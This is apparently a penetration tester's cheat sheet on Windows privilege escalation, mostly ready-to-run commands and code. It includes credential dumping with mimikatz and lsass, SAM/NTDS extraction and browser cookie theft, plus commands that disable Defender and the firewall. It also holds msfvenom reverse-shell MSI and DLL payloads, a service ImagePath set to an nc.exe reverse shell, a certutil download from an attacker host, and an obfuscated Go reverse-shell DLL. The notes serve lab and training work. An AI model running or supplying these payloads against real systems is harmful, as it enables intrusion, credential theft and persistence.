Windows Privilege Escalation

General and Useful shortlist command

powershell -ex bypass

add user

net user /add username password

add user to group

net localgroup groupname /add user
net group "Exchange Windows Permissions" svc-alfresco /add /domain

Enable rdp (need administrator)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable firewall

netsh advfirewall set allprofiles state off

Enable only remote desktop

netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Using nxc

netexec smb $IP -u administrator -p pass123 -M rdp -o ACTION=enable

Check permission on file or dir

cacls .
icacls .

share smb (on attacker machine)

impacket-smbserver -smb2support nameshare folder

Run as

run as /user:domain\samaccountname cmd.exe

Sharing folder using Dir properties -> https://youtu.be/jBfdlLybMek?si=qd9bu1ch_VPBO4Cm&t=8408

Initial Enumeration

User and Groups Enumeration

Logged-In user

query user

Current User

echo %USERNAME

Privilges

whoami /priv
whoami /alll

Groups Information

whoami /groups

All User on local machine

net user
net user /domain

All grous

net localgroup

Details about user

net user samname 
net user samname /domain

Detail about a group

net localgroup administrators

Pass policy

net accounts

Local User Description

Get-LocalUser

Computer Description

Get-WmiObject -Class Win32_OperatingSystem | select Description

OS and Process Enumeration

Info About OS

Get-WmiObject Win32_OperatingSystem | select -Property *

Process Running

tasklist /svc

Env variables set
Systeminfo

systeminfo

Patches and Updates

wmic qfe
Get-HotFix | ft -AutoSize

Installed programs

wmic product get name
Get-WmiObject -Class Win32_Product |  select Name, Version
Get-CimInstance -ClassName Win32_Product

Running Programs

Get-WmiObject Win32_Process | Format-List *

Running process and owner (not always work)

# other solution
Get-WmiObject Win32_Process | ForEach-Object {
    $process = $_
    $owner = $process.GetOwner()
    [PSCustomObject]@{
        ProcessName = $process.Name
        ProcessId   = $process.ProcessId
        User        = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { "N/A" }
    }
} | Format-Table -AutoSize


# other solution
Get-CimInstance Win32_Process | ForEach-Object {
    $process = $_
    $owner = Invoke-CimMethod -MethodName GetOwner   -InputObject $process
    Write-Host $process.name $owner
} 

# other solution
$owners = @{} 
gwmi win32_process |% {try {$owners[$_.handle] = $_.getowner().user} catch{} } 
(get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}})

Get process on main windows (displayed)

gps | ? { $_.MainWindowTitle }

Running Process with open port

netstat -ano

Get all services

Get-CimInstance -ClassName Win32_service
sc query
sc query state= all | findstr "SERVICE_NAME"

Get info about services

Get-Service "ServiceName"

Get all scheduled tasks

schtasks /query /fo LIST /v

Enumerate installed programs

wmic product get name

Enumerate local ports

netstat -ano | findstr 6064

Enumerate Process ID

get-process -Id 3324
gps -Id 3324

Enumerate Running Service
- get-service | ? {$_.DisplayName -like 'Druva*'}
- Get-CimInstance Win32_Service | Format-List *
Modifying PowerShell Execution Policy
- Set-ExecutionPolicy Bypass -Scope Process
Installed Programs without permission (works on winrm)

Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*'  | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty 'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'  | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

Search program by name

Get-CimInstance -ClassName Win32_Product | Where-Object { $_.Name -like "*name*" } | Select-Object Name, Version

Process Monitor

procmon from powershell

while($true){  
	$process = Get-WmiObject Win32_Process | Select-Object CommandLine
	Start-Sleep 1  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
	Compare-Object -ReferenceObject $process -DifferenceObject $process2}

sysinternals

Procmon.exe

How use procmon from command line

procmon.exe /Minimized /Quiet /Backingfile C:\Logs\procmon.pml
Start-Sleep -Seconds 10
procmon.exe /Terminate
procmon.exe /OpenLog C:\Logs\procmon.pml /SaveAs C:\Logs\procmon.csv /SaveFilter /Minimized

Enumerate all services and process and print also current owner

# Function to get the owner of a process
function Get-ProcessOwner {
    param (
        [System.Diagnostics.Process]$Process
    )
    try {
        $processHandle = $Process.Handle
        $processSecurity = Get-WmiObject Win32_Process -Filter "Handle = '$processHandle'"
        $owner = $processSecurity.GetOwner()
        return "$($owner.Domain)\$($owner.User)"
    } catch {
        return "N/A"
    }
}

# Enumerate all processes
Write-Host "Processes:"
Get-Process | ForEach-Object {
    $owner = Get-ProcessOwner $_
    Write-Host "Process: $($_.Name) - ProcessId: $($_.Id) - Owner: $owner"
}

# Function to get the owner of a service
function Get-ServiceOwner {
    param (
        [string]$ServiceName
    )
    try {
        $service = Get-WmiObject Win32_Service -Filter "Name = '$ServiceName'"
        $owner = $service.GetOwner()
        return "$($owner.Domain)\$($owner.User)"
    } catch {
        return "N/A"
    }
}

# Enumerate all services
Write-Host "`nServices:"
Get-Service | ForEach-Object {
    $owner = Get-ServiceOwner $_.Name
    $serviceId = $_.Id
    Write-Host "Service: $($_.Name) - ServiceId: $serviceId - Owner: $owner"
}

Network

Get Info About IP and network card

ipconfig /all

ARP Table:

arp -a

Routing table

route print

Enumeration Protection

Windows Defender

Get-MpComputerStatus

AppLocker

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Test AppLocker

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

Disable realtime

Set-MpPreference -DisableRealtimeMonitoring $true

Named Pipe

NamedPipes

Searching File & Creds

Searching File

tree /f /a 
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

Find file

dir /s/b filename
dir /s/b \filename # on all system
dir /s/b *.log
dir /s/b *.txt
dir /s/b *.doc*
dir /s/b *.zip
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Search only file name:

findstr /SI /M "password" *.xml *.ini *.txt

Search file content CMD:

findstr /si password *.xml *.ini *.txt *.config

Search file content PowerShell

select-string -Path <path>*.txt -Pattern password

Search file extension CMD

where /R C:\ *.config

Search file extension PowerShell

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Interesting File/Directories

From file extract extract password

gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Interesting file

Unattend.xml

Sticky notes

C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

PowerShell history

(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Powershell Command

Get-Credential API
Import-Clixml
Export-Clixml
runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Saved Credentials List

cmdkey /list

Execute SharpChrome for extracting data from DPAPI - https://github.com/GhostPack/SharpDPAPI/blob/master/README.md

SharpChrome.exe logins /unprotect

Password Manager
- Keepass -> kdbx -> keepass2jhon -> hashcat/jhon
Mail
- MailSniper
Lazagne - https://github.com/AlessandroZ/LaZagne - Credentials recovery project

lazagne.exe all

SessionGopher

Import-Module .\SessionGopher.ps1 
Invoke-SessionGopher -Target WINLPE-SRV01

Clear-Text Password in the Registry

Windows Autologon - If 1 is enabled

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Putty session file

Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

Wifi Password

netsh wlan show profile
netsh wlan show profile  name="Wifi" key=clear

VHDX/VMDK

Mount Linux

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

Windows -> Mount-VHD Mount-VHD
Resources -> Extract VMDK

Misconfiguration

AlwaysInstallelevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Exploit

Import-Module .\PowerUp.ps1 
Write-UserAddMSI

Generating MSI

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

Execute MSI

msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

BypassUAC - user account control
- Bypass-UAC - Bypass-UAC

Share with write permssion

SCF on a File Share
- Icon on attacker machine UNC IconFile=\\10.10.14.3\share\legit.ico
- Starting Responder/Inveigh/InveighZero
- Cracking using hashcat -m 5600
Malicious lnk file - LnkBomb LnkBomb

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Pillaging

Enumerate Installed applications

dir "C:\Program Files"

Using Registry Key

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Enumerate Installed services
- Websites
- File Shares
- Databases
- Directory Services (such as Active Directory, Azure AD, etc.)
- Name Servers
- Deployment Services
- Certificate Authority
- Source Code Management Server
- Virtualization
- Messaging
- Monitoring and Logging Systems
- Backups
Sensitive Data
- Keylogging
  - Clipboard - Invoke-Clipboard
- Screen Capture
- Network Traffic Capture
- Previous Audit reports
User Information
- History files, interesting documents (.doc/x,.xls/x,password/.pass, etc)
- Roles and Privileges
- Web Browsers
  - Firefox %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
    copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
    CookieExtractor CookieExtractor
  - Chrome
    SharpChromium - SharpChromium
    Fix copy for Invoke-SharpChromium copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
    InvokeSharpChromium - Invoke-SharpChromium
- IM Clients
  - Slack/Teams

If Administrator privilege, we can run mimikatz

Run mimikatz mimikatz

mimikatz.exe
privilege:debug
log
sekurlsa::logonpassword

Windows User Privileges

SeImpersonate and SeAssignPrimaryToken

SeDebugPrivilege

Using procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe 
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Exploit SYSTEM from child process
Get info about winlogon

tasklist

psgetsys.ps1

# proc id of winlogon of lsass
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(16452, "c:\windows\System32\cmd.exe", "")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe", "")

SeTakeOwnershipPrivilege

Enable Privilge

Import-Module .\Enable-Privilege.ps1

https://github.com/fashionproof/EnableAllTokenPrivs

.\EnableAllTokenPrivs.ps1

Choosing Target File

Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

Checking File Ownership

cmd /c dir /q 'C:\\Department Shares\\Private\\IT'

Take Ownership

takeown /f 'C:\\Department Shares\\Private\\IT\\cred.txt'

Modify FILE ACL

icacls 'C:\\Department Shares\\Private\\IT\\cred.txt' /grant htb-student:F

Windows Groups Privileges

Backup Operators

Enable Flag SeBackupPrivileg https://github.com/giuliano108/SeBackupPrivilege
Resources -> Exploit

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Start backup

diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit 
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

save system

reg save HKLM\\SYSTEM SYSTEM.SAV`
reg save hklm\system C:\temp\system.hive`

save sam

reg save HKLM\SAM SAM.SAV
reg save hklm\sam C:\temp\sam.hive

extracting using impacket

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Extracting Cred from NTDS.dit

Install-Module DSInternals -Force
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\\SYSTEM # or system.sav dipende da come lo abbiamo salvato prima
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

Extracting

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Create a copy

robocopy /B E:\Windows\\NTDS .\ntds ntds.dit

Event Log Readers

net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

DnsAdmins

Generate malicious dll

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Get info about group DNSAdmins

Get-ADGroupMember -Identity DnsAdmins

Change dll

dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll

Restart DNS Services (could be distruptive)

sc stop DNS
sc start DNS

Get SID user

wmic useraccount where name="netadm" get sid

Check permission on DNSService

sc.exe sdshow DNS

Hyper-V Administrators

From Hyper-V Administrator to Domain Admins

Print Operators - SeLoadDriverPrivilege

whoami /priv

EnableSeLoadDriverPrivilege.cpp Build

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Capcom.sys - Add Reference Driver

reg add HKCU\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\Tools\\Capcom.sys"

EnablePrivilges

EnableSeLoadDriverPrivilege.exe

Verifiy Driver is Loaded

.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom

Use ExploitCapcom .\ExploitCapcom.exe
Use EoPLoadDriver
Clean

reg delete HKCU\\System\\CurrentControlSet\\Capcom

Server Operators

Find Services that run in SYSTEM ad es., AppReadiness

sc qc AppReadiness

Check Permission with PsService

c:\Tools\PsService.exe security AppReadiness

Change binPath

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Start Service

sc start AppReadiness

User Account Control

Checking if UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Checking UAC Level

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

Checking Windows Version

[environment]::OSVersion.Version

Reviewing PATH

cmd /c echo %PATH%`

UAC bypass
- UACME - UACME
- UAC Mocking dir - uac-bypass-by-mocking-trusted-directories
- Bypass UAC - Bypass-UAC

Weak Permission

Permissive File System ACLs

Using

Sharphound.exe audit

for searching services modifiable ad es., SecurityService

Check permission

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Change executable

cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Restart Services

sc start SecurityService

Weak Service Permissions

Sharphound.exe audit

Using accesschk for reviewing permission about services

accesschk.exe /accepteula -quvcw WindscribeService

Query all services

sc query

Change binpath

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

Stop service

sc stop WindscribeService

Restart

sc start WindscribeService

Reverting to initial state

sc config WindScribeService binpath="c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe"
sc start WindScribeService`

In casi di permesso di shutdown e il servizio è autorun

shutdown -r -t 1

Unquoted Services

Querying service

sc qc SystemExplorerHelpService

Searching unquoted services

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Scheduled Task

schtasks /query /fo LIST /v
schtask /query /fo LIST /v /FN "Name"
Get-ScheduledTask | select TaskName,State

Permissive Registry ACLs

Checking Weak Service ACLs in Registry

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Changing ImagePath with PowerShell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

Modifiable Registry Autorun Binary

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/LogonAutostartExecutionRegistryRunKeys.md

Kernel Exploit

List vuln windows: https://msrc.microsoft.com/update-guide/vulnerability

wmic qfe list brief

Watson: Watson
Wesng: wesng

LOLBAS

Collection
- LOLBAS - LOLBAS
Transfer file

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

Encodign File

certutil -encode file1 encodedfile

Decoding file

Certutil -decode encodedfile file2

Execute dll

rundll32.exe file.dll,methodName

DLL Injection/Hijacking

DLL injection
- is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process.
- Execute an arbitrary DLL inside another process
  1. Locate the process to inject the malicious DLL CreateToolhelp32Snapshot, Process32First, Process32Next
  2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess
  3. Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory
  4. Create a thread in the process that will load the malicious DLL CreateRemoteThread, LoadLibrary
  5. Other functions to use: NTCreateThreadEx, RtlCreateUserThread
- LoadLibrary
- Manual Mapping
- Resources
  - DLL Injection Hacktips - DLL Injection
  - IredTeam DLL Injection - IredTeam-DLL Injection
DLL Hijacking
- DLL Hijacking is an exploitation technique where an attacker capitalizes on the Windows DLL loading process.
  - DLL Replacement: replace a legitimate DLL with an evil DLL. Combined with DLL Proxying
  - DLL Search Order Hijacking: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL Ref -[Ref.]
  - Phantom DLL hijacking: Drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.
  - DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local .Ref [Ref.]
  - WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often DLL side-loading. Ref - [Ref.]
  - Relative path DLL Hijacking: Copy the legitimate application to a user-writable folder, alongside the evil DLL.
- Find Missing DLL
  - procmon → filter → Results contain not Found and → Paths end with .dll
- To escalate privileges
  - Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.
  - Ensure write access is available for any directory in which the DLL will be searched for icacls “Path-To-Dir”
- Tools
  - winpeas
  - siofra - Siofra
  - powersploit
    Find-ProcessDLLHijack
    Find-PathDLLHijack
    Write-HijackDll
- Resources
  - DLL Hijacking Hacktricks - DLL Hijacking
  - DLL Hijacking Prives - DLL Hijacking PrivEsc
  - Hacking dlls in windows - hijacking-dlls-in-windows
  - tcapt dll hijacking - tcapt-dll-hijacking
  - DLL Hijacking - DLL Hijacking
  - IPPSEC DLL Hijacking
DLL Reflective
- Resources
  - Reflective DLL Injection: Reflective DLL Injection
DLL SideLoading
- Resources
  - Dll sideloading proxying dll-sideloading-proxying
DLL Proxying
- Basically a Dll proxy is a Dll capable of execute your malicious code when loaded but also to expose and work as exected by relaying all the calls to the real library.
- Get RevShell (N.B. is very important arch used)

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll
msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll

msfconsole -> use multi/handler
Write Code
- DLL Write
How to compile dll
x64

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

x86

i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

Link to Windows Sockets 2, necessary for rev shell

i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared

Alternative use VisualStudio e C#
Using go:

package main

import (
  "C"
  "os/exec"
  "net"
)

//export VerifyThemeVersion 
func VerifyThemeVersion(){
  main()
}

func main() {
        dst := "192.168.1.152" // set ip
        pnum := "9999"  // set port
        connstring := dst + ":" + pnum
        prot := "tcp"
        netData, _ := net.Dial(prot, connstring)
        shell := exec.Command("pow" + "er" + "she" + "ll.e" + "xe")
        shell.Stdin=netData
        shell.Stdout=netData
        shell.Stderr=netData
        shell.Run()
}

# x86
OOS=windows GOARCH=386 CGO_ENABLED=1 CC=i686-w64-mingw32-gcc go build -buildmode=c-shared -o main.dll reverse_shell.go  
#amd64
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o evil.dll ./calculator.go

How to check if DLL work

rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll

rundll32.exe injection.dll,0

Tools
- Procmon
- Process Explorer
- VisualStudio

Resources

Payload windows privesc
hacktricks
LOLBAS
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/tree/master

Tools

PreviousLinux Privilege Escalation NextAndroid Application Pentesting

Last updated 7 months ago